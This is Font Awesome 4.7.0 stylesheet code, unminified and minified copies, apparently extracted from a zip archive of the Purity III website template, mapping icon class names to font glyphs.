.fa-scribd:before {
  content: "\f28a";
}
.fa-pause-circle:before {
  content: "\f28b";
}
.fa-pause-circle-o:before {
  content: "\f28c";
}
.fa-stop-circle:before {
  content: "\f28d";
}
.fa-stop-circle-o:before {
  content: "\f28e";
}
.fa-shopping-bag:before {
  content: "\f290";
}
.fa-shopping-basket:before {
  content: "\f291";
}
.fa-hashtag:before {
  content: "\f292";
}
.fa-bluetooth:before {
  content: "\f293";
}
.fa-bluetooth-b:before {
  content: "\f294";
}
.fa-percent:before {
  content: "\f295";
}
.fa-gitlab:before {
  content: "\f296";
}
.fa-wpbeginner:before {
  content: "\f297";
}
.fa-wpforms:before {
  content: "\f298";
}
.fa-envira:before {
  content: "\f299";
}
.fa-universal-access:before {
  content: "\f29a";
}
.fa-wheelchair-alt:before {
  content: "\f29b";
}
.fa-question-circle-o:before {
  content: "\f29c";
}
.fa-blind:before {
  content: "\f29d";
}
.fa-audio-description:before {
  content: "\f29e";
}
.fa-volume-control-phone:before {
  content: "\f2a0";
}
.fa-braille:before {
  content: "\f2a1";
}
.fa-assistive-listening-systems:before {
  content: "\f2a2";
}
.fa-asl-interpreting:before,
.fa-american-sign-language-interpreting:before {
  content: "\f2a3";
}
.fa-deafness:before,
.fa-hard-of-hearing:before,
.fa-deaf:before {
  content: "\f2a4";
}
.fa-glide:before {
  content: "\f2a5";
}
.fa-glide-g:before {
  content: "\f2a6";
}
.fa-signing:before,
.fa-sign-language:before {
  content: "\f2a7";
}
.fa-low-vision:before {
  content: "\f2a8";
}
.fa-viadeo:before {
  content: "\f2a9";
}
.fa-viadeo-square:before {
  content: "\f2aa";
}
.fa-snapchat:before {
  content: "\f2ab";
}
.fa-snapchat-ghost:before {
  content: "\f2ac";
}
.fa-snapchat-square:before {
  content: "\f2ad";
}
.fa-pied-piper:before {
  content: "\f2ae";
}
.fa-first-order:before {
  content: "\f2b0";
}
.fa-yoast:before {
  content: "\f2b1";
}
.fa-themeisle:before {
  content: "\f2b2";
}
.fa-google-plus-circle:before,
.fa-google-plus-official:before {
  content: "\f2b3";
}
.fa-fa:before,
.fa-font-awesome:before {
  content: "\f2b4";
}
.fa-handshake-o:before {
  content: "\f2b5";
}
.fa-envelope-open:before {
  content: "\f2b6";
}
.fa-envelope-open-o:before {
  content: "\f2b7";
}
.fa-linode:before {
  content: "\f2b8";
}
.fa-address-book:before {
  content: "\f2b9";
}
.fa-address-book-o:before {
  content: "\f2ba";
}
.fa-vcard:before,
.fa-address-card:before {
  content: "\f2bb";
}
.fa-vcard-o:before,
.fa-address-card-o:before {
  content: "\f2bc";
}
.fa-user-circle:before {
  content: "\f2bd";
}
.fa-user-circle-o:before {
  content: "\f2be";
}
.fa-user-o:before {
  content: "\f2c0";
}
.fa-id-badge:before {
  content: "\f2c1";
}
.fa-drivers-license:before,
.fa-id-card:before {
  content: "\f2c2";
}
.fa-drivers-license-o:before,
.fa-id-card-o:before {
  content: "\f2c3";
}
.fa-quora:before {
  content: "\f2c4";
}
.fa-free-code-camp:before {
  content: "\f2c5";
}
.fa-telegram:before {
  content: "\f2c6";
}
.fa-thermometer-4:before,
.fa-thermometer:before,
.fa-thermometer-full:before {
  content: "\f2c7";
}
.fa-thermometer-3:before,
.fa-thermometer-three-quarters:before {
  content: "\f2c8";
}
.fa-thermometer-2:before,
.fa-thermometer-half:before {
  content: "\f2c9";
}
.fa-thermometer-1:before,
.fa-thermometer-quarter:before {
  content: "\f2ca";
}
.fa-thermometer-0:before,
.fa-thermometer-empty:before {
  content: "\f2cb";
}
.fa-shower:before {
  content: "\f2cc";
}
.fa-bathtub:before,
.fa-s15:before,
.fa-bath:before {
  content: "\f2cd";
}
.fa-podcast:before {
  content: "\f2ce";
}
.fa-window-maximize:before {
  content: "\f2d0";
}
.fa-window-minimize:before {
  content: "\f2d1";
}
.fa-window-restore:before {
  content: "\f2d2";
}
.fa-times-rectangle:before,
.fa-window-close:before {
  content: "\f2d3";
}
.fa-times-rectangle-o:before,
.fa-window-close-o:before {
  content: "\f2d4";
}
.fa-bandcamp:before {
  content: "\f2d5";
}
.fa-grav:before {
  content: "\f2d6";
}
.fa-etsy:before {
  content: "\f2d7";
}
.fa-imdb:before {
  content: "\f2d8";
}
.fa-ravelry:before {
  content: "\f2d9";
}
.fa-eercast:before {
  content: "\f2da";
}
.fa-microchip:before {
  content: "\f2db";
}
.fa-snowflake-o:before {
  content: "\f2dc";
}
.fa-superpowers:before {
  content: "\f2dd";
}
.fa-wpexplorer:before {
  content: "\f2de";
}
.fa-meetup:before {
  content: "\f2e0";
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  margin: -1px;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
PKԜ�\�8�yy6purity_iii/fonts/font-awesome/css/font-awesome.min.cssnu&1i�/*!
 *  Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
 *  License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
 */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{padding-left:0;margin-left:2.14285714em;list-style-type:none}.fa-ul>li{position:relative}.fa-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.fa-li.fa-lg{left:-1.85714286em}.fa-border{padding:.2em .25em .15em;border:solid .08em #eee;border-radius:.1em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left{margin-right:.3em}.fa.fa-pull-right{margin-left:.3em}.pull-right{float:right}.pull-left{float:left}.fa.pull-left{margin-right:.3em}.fa.pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s infinite linear;animation:fa-spin 2s infinite linear}.fa-pulse{-webkit-animation:fa-spin 1s infinite steps(8);animation:fa-spin 1s infinite steps(8)}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-rotate-90{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";-webkit-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";-webkit-transform:rotate(180deg);-ms-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";-webkit-transform:rotate(270deg);-ms-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";-webkit-transform:scale(-1, 1);-ms-transform:scale(-1, 1);transform:scale(-1, 1)}.fa-flip-vertical{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";-webkit-transform:scale(1, -1);-ms-transform:scale(1, -1);transform:scale(1, -1)}:root .fa-rotate-90,:root .fa-rotate-180,:root .fa-rotate-270,:root .fa-flip-horizontal,:root .fa-flip-vertical{filter:none}.fa-stack{position:relative;display:inline-block;width:2em;height:2em;line-height:2em;vertical-align:middle}.fa-stack-1x,.fa-stack-2x{position:absolute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002"}.fa-envelope-o:before{content:"\f003"}.fa-heart:before{content:"\f004"}.fa-star:before{content:"\f005"}.fa-star-o:before{content:"\f006"}.fa-user:before{content:"\f007"}.fa-film:before{content:"\f008"}.fa-th-large:before{content:"\f009"}.fa-th:before{content:"\f00a"}.fa-th-list:before{content:"\f00b"}.fa-check:before{content:"\f00c"}.fa-remove:before,.fa-close:before,.fa-times:before{content:"\f00d"}.fa-search-plus:before{content:"\f00e"}.fa-search-minus:before{content:"\f010"}.fa-power-off:before{content:"\f011"}.fa-signal:before{content:"\f012"}.fa-gear:before,.fa-cog:before{content:"\f013"}.fa-trash-o:before{content:"\f014"}.fa-home:before{content:"\f015"}.fa-file-o:before{content:"\f016"}.fa-clock-o:before{content:"\f017"}.fa-road:before{content:"\f018"}.fa-download:before{content:"\f019"}.fa-arrow-circle-o-down:before{content:"\f01a"}.fa-arrow-circle-o-up:before{content:"\f01b"}.fa-inbox:before{content:"\f01c"}.fa-play-circle-o:before{content:"\f01d"}.fa-rotate-right:before,.fa-repeat:before{content:"\f01e"}.fa-refresh:before{content:"\f021"}.fa-list-alt:before{content:"\f022"}.fa-lock:before{content:"\f023"}.fa-flag:before{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before{content:"\f02a"}.fa-tag:before{content:"\f02b"}.fa-tags:before{content:"\f02c"}.fa-book:before{content:"\f02d"}.fa-bookmark:before{content:"\f02e"}.fa-print:before{content:"\f02f"}.fa-camera:before{content:"\f030"}.fa-font:before{content:"\f031"}.fa-bold:before{content:"\f032"}.fa-italic:before{content:"\f033"}.fa-text-height:before{content:"\f034"}.fa-text-width:before{content:"\f035"}.fa-align-left:before{content:"\f036"}.fa-align-center:before{content:"\f037"}.fa-align-right:before{content:"\f038"}.fa-align-justify:before{content:"\f039"}.fa-list:before{content:"\f03a"}.fa-dedent:before,.fa-outdent:before{content:"\f03b"}.fa-indent:before{content:"\f03c"}.fa-video-camera:before{content:"\f03d"}.fa-photo:before,.fa-image:before,.fa-picture-o:before{content:"\f03e"}.fa-pencil:before{content:"\f040"}.fa-map-marker:before{content:"\f041"}.fa-adjust:before{content:"\f042"}.fa-tint:before{content:"\f043"}.fa-edit:before,.fa-pencil-square-o:before{content:"\f044"}.fa-share-square-o:before{content:"\f045"}.fa-check-square-o:before{content:"\f046"}.fa-arrows:before{content:"\f047"}.fa-step-backward:before{content:"\f048"}.fa-fast-backward:before{content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{content:"\f050"}.fa-step-forward:before{content:"\f051"}.fa-eject:before{content:"\f052"}.fa-chevron-left:before{content:"\f053"}.fa-chevron-right:before{content:"\f054"}.fa-plus-circle:before{content:"\f055"}.fa-minus-circle:before{content:"\f056"}.fa-times-circle:before{content:"\f057"}.fa-check-circle:before{content:"\f058"}.fa-question-circle:before{content:"\f059"}.fa-info-circle:before{content:"\f05a"}.fa-crosshairs:before{content:"\f05b"}.fa-times-circle-o:before{content:"\f05c"}.fa-check-circle-o:before{content:"\f05d"}.fa-ban:before{content:"\f05e"}.fa-arrow-left:before{content:"\f060"}.fa-arrow-right:before{content:"\f061"}.fa-arrow-up:before{content:"\f062"}.fa-arrow-down:before{content:"\f063"}.fa-mail-forward:before,.fa-share:before{content:"\f064"}.fa-expand:before{content:"\f065"}.fa-compress:before{content:"\f066"}.fa-plus:before{content:"\f067"}.fa-minus:before{content:"\f068"}.fa-asterisk:before{content:"\f069"}.fa-exclamation-circle:before{content:"\f06a"}.fa-gift:before{content:"\f06b"}.fa-leaf:before{content:"\f06c"}.fa-fire:before{content:"\f06d"}.fa-eye:before{content:"\f06e"}.fa-eye-slash:before{content:"\f070"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:before{content:"\f076"}.fa-chevron-up:before{content:"\f077"}.fa-chevron-down:before{content:"\f078"}.fa-retweet:before{content:"\f079"}.fa-shopping-cart:before{content:"\f07a"}.fa-folder:before{content:"\f07b"}.fa-folder-open:before{content:"\f07c"}.fa-arrows-v:before{content:"\f07d"}.fa-arrows-h:before{content:"\f07e"}.fa-bar-chart-o:before,.fa-bar-chart:before{content:"\f080"}.fa-twitter-square:before{content:"\f081"}.fa-facebook-square:before{content:"\f082"}.fa-camera-retro:before{content:"\f083"}.fa-key:before{content:"\f084"}.fa-gears:before,.fa-cogs:before{content:"\f085"}.fa-comments:before{content:"\f086"}.fa-thumbs-o-up:before{content:"\f087"}.fa-thumbs-o-down:before{content:"\f088"}.fa-star-half:before{content:"\f089"}.fa-heart-o:before{content:"\f08a"}.fa-sign-out:before{content:"\f08b"}.fa-linkedin-square:before{content:"\f08c"}.fa-thumb-tack:before{content:"\f08d"}.fa-external-link:before{content:"\f08e"}.fa-sign-in:before{content:"\f090"}.fa-trophy:before{content:"\f091"}.fa-github-square:before{content:"\f092"}.fa-upload:before{content:"\f093"}.fa-lemon-o:before{content:"\f094"}.fa-phone:before{content:"\f095"}.fa-square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{content:"\f09b"}.fa-unlock:before{content:"\f09c"}.fa-credit-card:before{content:"\f09d"}.fa-feed:before,.fa-rss:before{content:"\f09e"}.fa-hdd-o:before{content:"\f0a0"}.fa-bullhorn:before{content:"\f0a1"}.fa-bell:before{content:"\f0f3"}.fa-certificate:before{content:"\f0a3"}.fa-hand-o-right:before{content:"\f0a4"}.fa-hand-o-left:before{content:"\f0a5"}.fa-hand-o-up:before{content:"\f0a6"}.fa-hand-o-down:before{content:"\f0a7"}.fa-arrow-circle-left:before{content:"\f0a8"}.fa-arrow-circle-right:before{content:"\f0a9"}.fa-arrow-circle-up:before{content:"\f0aa"}.fa-arrow-circle-down:before{content:"\f0ab"}.fa-globe:before{content:"\f0ac"}.fa-wrench:before{content:"\f0ad"}.fa-tasks:before{content:"\f0ae"}.fa-filter:before{content:"\f0b0"}.fa-briefcase:before{content:"\f0b1"}.fa-arrows-alt:before{content:"\f0b2"}.fa-group:before,.fa-users:before{content:"\f0c0"}.fa-chain:before,.fa-link:before{content:"\f0c1"}.fa-cloud:before{content:"\f0c2"}.fa-flask:before{content:"\f0c3"}.fa-cut:before,.fa-scissors:before{content:"\f0c4"}.fa-copy:before,.fa-files-o:before{content:"\f0c5"}.fa-paperclip:before{content:"\f0c6"}.fa-save:before,.fa-floppy-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:before{content:"\f0cc"}.fa-underline:before{content:"\f0cd"}.fa-table:before{content:"\f0ce"}.fa-magic:before{content:"\f0d0"}.fa-truck:before{content:"\f0d1"}.fa-pinterest:before{content:"\f0d2"}.fa-pinterest-square:before{content:"\f0d3"}.fa-google-plus-square:before{content:"\f0d4"}.fa-google-plus:before{content:"\f0d5"}.fa-money:before{content:"\f0d6"}.fa-caret-down:before{content:"\f0d7"}.fa-caret-up:before{content:"\f0d8"}.fa-caret-left:before{content:"\f0d9"}.fa-caret-right:before{content:"\f0da"}.fa-columns:before{content:"\f0db"}.fa-unsorted:before,.fa-sort:before{content:"\f0dc"}.fa-sort-down:before,.fa-sort-desc:before{content:"\f0dd"}.fa-sort-up:before,.fa-sort-asc:before{content:"\f0de"}.fa-envelope:before{content:"\f0e0"}.fa-linkedin:before{content:"\f0e1"}.fa-rotate-left:before,.fa-undo:before{content:"\f0e2"}.fa-legal:before,.fa-gavel:before{content:"\f0e3"}.fa-dashboard:before,.fa-tachometer:before{content:"\f0e4"}.fa-comment-o:before{content:"\f0e5"}.fa-comments-o:before{content:"\f0e6"}.fa-flash:before,.fa-bolt:before{content:"\f0e7"}.fa-sitemap:before{content:"\f0e8"}.fa-umbrella:before{content:"\f0e9"}.fa-paste:before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{content:"\f0f0"}.fa-stethoscope:before{content:"\f0f1"}.fa-suitcase:before{content:"\f0f2"}.fa-bell-o:before{content:"\f0a2"}.fa-coffee:before{content:"\f0f4"}.fa-cutlery:before{content:"\f0f5"}.fa-file-text-o:before{content:"\f0f6"}.fa-building-o:before{content:"\f0f7"}.fa-hospital-o:before{content:"\f0f8"}.fa-ambulance:before{content:"\f0f9"}.fa-medkit:before{content:"\f0fa"}.fa-fighter-jet:before{content:"\f0fb"}.fa-beer:before{content:"\f0fc"}.fa-h-square:before{content:"\f0fd"}.fa-plus-square:before{content:"\f0fe"}.fa-angle-double-left:before{content:"\f100"}.fa-angle-double-right:before{content:"\f101"}.fa-angle-double-up:before{content:"\f102"}.fa-angle-double-down:before{content:"\f103"}.fa-angle-left:before{content:"\f104"}.fa-angle-right:before{content:"\f105"}.fa-angle-up:before{content:"\f106"}.fa-angle-down:before{content:"\f107"}.fa-desktop:before{content:"\f108"}.fa-laptop:before{content:"\f109"}.fa-tablet:before{content:"\f10a"}.fa-mobile-phone:before,.fa-mobile:before{content:"\f10b"}.fa-circle-o:before{content:"\f10c"}.fa-quote-left:before{content:"\f10d"}.fa-quote-right:before{content:"\f10e"}.fa-spinner:before{content:"\f110"}.fa-circle:before{content:"\f111"}.fa-mail-reply:before,.fa-reply:before{content:"\f112"}.fa-github-alt:before{content:"\f113"}.fa-folder-o:before{content:"\f114"}.fa-folder-open-o:before{content:"\f115"}.fa-smile-o:before{content:"\f118"}.fa-frown-o:before{content:"\f119"}.fa-meh-o:before{content:"\f11a"}.fa-gamepad:before{content:"\f11b"}.fa-keyboard-o:before{content:"\f11c"}.fa-flag-o:before{content:"\f11d"}.fa-flag-checkered:before{content:"\f11e"}.fa-terminal:before{content:"\f120"}.fa-code:before{content:"\f121"}.fa-mail-reply-all:before,.fa-reply-all:before{content:"\f122"}.fa-star-half-empty:before,.fa-star-half-full:before,.fa-star-half-o:before{content:"\f123"}.fa-location-arrow:before{content:"\f124"}.fa-crop:before{content:"\f125"}.fa-code-fork:before{content:"\f126"}.fa-unlink:before,.fa-chain-broken:before{content:"\f127"}.fa-question:before{content:"\f128"}.fa-info:before{content:"\f129"}.fa-exclamation:before{content:"\f12a"}.fa-superscript:before{content:"\f12b"}.fa-subscript:before{content:"\f12c"}.fa-eraser:before{content:"\f12d"}.fa-puzzle-piece:before{content:"\f12e"}.fa-microphone:before{content:"\f130"}.fa-microphone-slash:before{content:"\f131"}.fa-shield:before{content:"\f132"}.fa-calendar-o:before{content:"\f133"}.fa-fire-extinguisher:before{content:"\f134"}.fa-rocket:before{content:"\f135"}.fa-maxcdn:before{content:"\f136"}.fa-chevron-circle-left:before{content:"\f137"}.fa-chevron-circle-right:before{content:"\f138"}.fa-chevron-circle-up:before{content:"\f139"}.fa-chevron-circle-down:before{content:"\f13a"}.fa-html5:before{content:"\f13b"}.fa-css3:before{content:"\f13c"}.fa-anchor:before{content:"\f13d"}.fa-unlock-alt:before{content:"\f13e"}.fa-bullseye:before{content:"\f140"}.fa-ellipsis-h:before{content:"\f141"}.fa-ellipsis-v:before{content:"\f142"}.fa-rss-square:before{content:"\f143"}.fa-play-circle:before{content:"\f144"}.fa-ticket:before{content:"\f145"}.fa-minus-square:before{content:"\f146"}.fa-minus-square-o:before{content:"\f147"}.fa-level-up:before{content:"\f148"}.fa-level-down:before{content:"\f149"}.fa-check-square:before{content:"\f14a"}.fa-pencil-square:before{content:"\f14b"}.fa-external-link-square:before{content:"\f14c"}.fa-share-square:before{content:"\f14d"}.fa-compass:before{content:"\f14e"}.fa-toggle-down:before,.fa-caret-square-o-down:before{content:"\f150"}.fa-toggle-up:before,.fa-caret-square-o-up:before{content:"\f151"}.fa-toggle-right:before,.fa-caret-square-o-right:before{content:"\f152"}.fa-euro:before,.fa-eur:before{content:"\f153"}.fa-gbp:before{content:"\f154"}.fa-dollar:before,.fa-usd:before{content:"\f155"}.fa-rupee:before,.fa-inr:before{content:"\f156"}.fa-cny:before,.fa-rmb:before,.fa-yen:before,.fa-jpy:before{content:"\f157"}.fa-ruble:before,.fa-rouble:before,.fa-rub:before{content:"\f158"}.fa-won:before,.fa-krw:before{content:"\f159"}.fa-bitcoin:before,.fa-btc:before{content:"\f15a"}.fa-file:before{content:"\f15b"}.fa-file-text:before{content:"\f15c"}.fa-sort-alpha-asc:before{content:"\f15d"}.fa-sort-alpha-desc:before{content:"\f15e"}.fa-sort-amount-asc:before{content:"\f160"}.fa-sort-amount-desc:before{content:"\f161"}.fa-sort-numeric-asc:before{content:"\f162"}.fa-sort-numeric-desc:before{content:"\f163"}.fa-thumbs-up:before{content:"\f164"}.fa-thumbs-down:before{content:"\f165"}.fa-youtube-square:before{content:"\f166"}.fa-youtube:before{content:"\f167"}.fa-xing:before{content:"\f168"}.fa-xing-square:before{content:"\f169"}.fa-youtube-play:before{content:"\f16a"}.fa-dropbox:before{content:"\f16b"}.fa-stack-overflow:before{content:"\f16c"}.fa-instagram:before{content:"\f16d"}.fa-flickr:before{content:"\f16e"}.fa-adn:before{content:"\f170"}.fa-bitbucket:before{content:"\f171"}.fa-bitbucket-square:before{content:"\f172"}.fa-tumblr:before{content:"\f173"}.fa-tumblr-square:before{content:"\f174"}.fa-long-arrow-down:before{content:"\f175"}.fa-long-arrow-up:before{content:"\f176"}.fa-long-arrow-left:before{content:"\f177"}.fa-long-arrow-right:before{content:"\f178"}.fa-apple:before{content:"\f179"}.fa-windows:before{content:"\f17a"}.fa-android:before{content:"\f17b"}.fa-linux:before{content:"\f17c"}.fa-dribbble:before{content:"\f17d"}.fa-skype:before{content:"\f17e"}.fa-foursquare:before{content:"\f180"}.fa-trello:before{content:"\f181"}.fa-female:before{content:"\f182"}.fa-male:before{content:"\f183"}.fa-gittip:before,.fa-gratipay:before{content:"\f184"}.fa-sun-o:before{content:"\f185"}.fa-moon-o:before{content:"\f186"}.fa-archive:before{content:"\f187"}.fa-bug:before{content:"\f188"}.fa-vk:before{content:"\f189"}.fa-weibo:before{content:"\f18a"}.fa-renren:before{content:"\f18b"}.fa-pagelines:before{content:"\f18c"}.fa-stack-exchange:before{content:"\f18d"}.fa-arrow-circle-o-right:before{content:"\f18e"}.fa-arrow-circle-o-left:before{content:"\f190"}.fa-toggle-left:before,.fa-caret-square-o-left:before{content:"\f191"}.fa-dot-circle-o:before{content:"\f192"}.fa-wheelchair:before{content:"\f193"}.fa-vimeo-square:before{content:"\f194"}.fa-turkish-lira:before,.fa-try:before{content:"\f195"}.fa-plus-square-o:before{content:"\f196"}.fa-space-shuttle:before{content:"\f197"}.fa-slack:before{content:"\f198"}.fa-envelope-square:before{content:"\f199"}.fa-wordpress:before{content:"\f19a"}.fa-openid:before{content:"\f19b"}.fa-institution:before,.fa-bank:before,.fa-university:before{content:"\f19c"}.fa-mortar-board:before,.fa-graduation-cap:before{content:"\f19d"}.fa-yahoo:before{content:"\f19e"}.fa-google:before{content:"\f1a0"}.fa-reddit:before{content:"\f1a1"}.fa-reddit-square:before{content:"\f1a2"}.fa-stumbleupon-circle:before{content:"\f1a3"}.fa-stumbleupon:before{content:"\f1a4"}.fa-delicious:before{content:"\f1a5"}.fa-digg:before{content:"\f1a6"}.fa-pied-piper-pp:before{content:"\f1a7"}.fa-pied-piper-alt:before{content:"\f1a8"}.fa-drupal:before{content:"\f1a9"}.fa-joomla:before{content:"\f1aa"}.fa-language:before{content:"\f1ab"}.fa-fax:before{content:"\f1ac"}.fa-building:before{content:"\f1ad"}.fa-child:before{content:"\f1ae"}.fa-paw:before{content:"\f1b0"}.fa-spoon:before{content:"\f1b1"}.fa-cube:before{content:"\f1b2"}.fa-cubes:before{content:"\f1b3"}.fa-behance:before{content:"\f1b4"}.fa-behance-square:before{content:"\f1b5"}.fa-steam:before{content:"\f1b6"}.fa-steam-square:before{content:"\f1b7"}.fa-recycle:before{content:"\f1b8"}.fa-automobile:before,.fa-car:before{content:"\f1b9"}.fa-cab:before,.fa-taxi:before{content:"\f1ba"}.fa-tree:before{content:"\f1bb"}.fa-spotify:before{content:"\f1bc"}.fa-deviantart:before{content:"\f1bd"}.fa-soundcloud:before{content:"\f1be"}.fa-database:before{content:"\f1c0"}.fa-file-pdf-o:before{content:"\f1c1"}.fa-file-word-o:before{content:"\f1c2"}.fa-file-excel-o:before{content:"\f1c3"}.fa-file-powerpoint-o:before{content:"\f1c4"}.fa-file-photo-o:before,.fa-file-picture-o:before,.fa-file-image-o:before{content:"\f1c5"}.fa-file-zip-o:before,.fa-file-archive-o:before{content:"\f1c6"}.fa-file-sound-o:before,.fa-file-audio-o:before{content:"\f1c7"}.fa-file-movie-o:before,.fa-file-video-o:before{content:"\f1c8"}.fa-file-code-o:before{content:"\f1c9"}.fa-vine:before{content:"\f1ca"}.fa-codepen:before{content:"\f1cb"}.fa-jsfiddle:before{content:"\f1cc"}.fa-life-bouy:before,.fa-life-buoy:before,.fa-life-saver:before,.fa-support:before,.fa-life-ring:before{content:"\f1cd"}.fa-circle-o-notch:before{content:"\f1ce"}.fa-ra:before,.fa-resistance:before,.fa-rebel:before{content:"\f1d0"}.fa-ge:before,.fa-empire:before{content:"\f1d1"}.fa-git-square:before{content:"\f1d2"}.fa-git:before{content:"\f1d3"}.fa-y-combinator-square:before,.fa-yc-square:before,.fa-hacker-news:before{content:"\f1d4"}.fa-tencent-weibo:before{content:"\f1d5"}.fa-qq:before{content:"\f1d6"}.fa-wechat:before,.fa-weixin:before{content:"\f1d7"}.fa-send:before,.fa-paper-plane:before{content:"\f1d8"}.fa-send-o:before,.fa-paper-plane-o:before{content:"\f1d9"}.fa-history:before{content:"\f1da"}.fa-circle-thin:before{content:"\f1db"}.fa-header:before{content:"\f1dc"}.fa-paragraph:before{content:"\f1dd"}.fa-sliders:before{content:"\f1de"}.fa-share-alt:before{content:"\f1e0"}.fa-share-alt-square:before{content:"\f1e1"}.fa-bomb:before{content:"\f1e2"}.fa-soccer-ball-o:before,.fa-futbol-o:before{content:"\f1e3"}.fa-tty:before{content:"\f1e4"}.fa-binoculars:before{content:"\f1e5"}.fa-plug:before{content:"\f1e6"}.fa-slideshare:before{content:"\f1e7"}.fa-twitch:before{content:"\f1e8"}.fa-yelp:before{content:"\f1e9"}.fa-newspaper-o:before{content:"\f1ea"}.fa-wifi:before{content:"\f1eb"}.fa-calculator:before{content:"\f1ec"}.fa-paypal:before{content:"\f1ed"}.fa-google-wallet:before{content:"\f1ee"}.fa-cc-visa:before{content:"\f1f0"}.fa-cc-mastercard:before{content:"\f1f1"}.fa-cc-discover:before{content:"\f1f2"}.fa-cc-amex:before{content:"\f1f3"}.fa-cc-paypal:before{content:"\f1f4"}.fa-cc-stripe:before{content:"\f1f5"}.fa-bell-slash:before{content:"\f1f6"}.fa-bell-slash-o:before{content:"\f1f7"}.fa-trash:before{content:"\f1f8"}.fa-copyright:before{content:"\f1f9"}.fa-at:before{content:"\f1fa"}.fa-eyedropper:before{content:"\f1fb"}.fa-paint-brush:before{content:"\f1fc"}.fa-birthday-cake:before{content:"\f1fd"}.fa-area-chart:before{content:"\f1fe"}.fa-pie-chart:before{content:"\f200"}.fa-line-chart:before{content:"\f201"}.fa-lastfm:before{content:"\f202"}.fa-lastfm-square:before{content:"\f203"}.fa-toggle-off:before{content:"\f204"}.fa-toggle-on:before{content:"\f205"}.fa-bicycle:before{content:"\f206"}.fa-bus:before{content:"\f207"}.fa-ioxhost:before{content:"\f208"}.fa-angellist:before{content:"\f209"}.fa-cc:before{content:"\f20a"}.fa-shekel:before,.fa-sheqel:before,.fa-ils:before{content:"\f20b"}.fa-meanpath:before{content:"\f20c"}.fa-buysellads:before{content:"\f20d"}.fa-connectdevelop:before{content:"\f20e"}.fa-dashcube:before{content:"\f210"}.fa-forumbee:before{content:"\f211"}.fa-leanpub:before{content:"\f212"}.fa-sellsy:before{content:"\f213"}.fa-shirtsinbulk:before{content:"\f214"}.fa-simplybuilt:before{content:"\f215"}.fa-skyatlas:before{content:"\f216"}.fa-cart-plus:before{content:"\f217"}.fa-cart-arrow-down:before{content:"\f218"}.fa-diamond:before{content:"\f219"}.fa-ship:before{content:"\f21a"}.fa-user-secret:before{content:"\f21b"}.fa-motorcycle:before{content:"\f21c"}.fa-street-view:before{content:"\f21d"}.fa-heartbeat:before{content:"\f21e"}.fa-venus:before{content:"\f221"}.fa-mars:before{content:"\f222"}.fa-mercury:before{content:"\f223"}.fa-intersex:before,.fa-transgender:before{content:"\f224"}.fa-transgender-alt:before{content:"\f225"}.fa-venus-double:before{content:"